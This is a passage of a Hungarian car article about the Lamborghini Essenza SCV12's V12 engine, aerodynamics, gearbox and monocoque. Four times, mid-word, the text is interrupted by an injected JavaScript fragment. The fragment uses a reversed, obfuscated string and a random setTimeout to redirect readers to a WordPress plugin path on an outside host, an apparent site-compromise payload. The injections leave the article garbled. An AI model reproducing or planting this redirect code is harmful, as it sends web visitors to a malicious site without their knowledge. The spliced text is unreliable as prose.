Több mint 830 lóerős teljesítményével az Essenza tizenkét hengeres motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja a legerősebb szívó V12-es, amelyet a Lamborghini valaha épített. Ennél is izgalmasabb az autó aerodinamikája, amelyet a márka versenyautói ihlettek: 250 km/óránál például 1,2 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonna (!) préseli az aszfalthoz az autót – ez több, mint ami a márka GT3-as versenyautóját a pályára szögezi. A motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torteljesítményt a nagy sebességnél fellépő toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torlólevegő-hatás mellett a speciális, kis negatív nyomású kipufogórendszer is növeli. A váltó hatfokozatú szekvenciális; a váltóházat teherviselő elemként építik be. Ez nem csak merevebbé, de könnyebbé is teszi az autót, amely belső bukókeret nélküli, szénszálas monocoque vázat kapott – és ezzel…
- Hirdetés -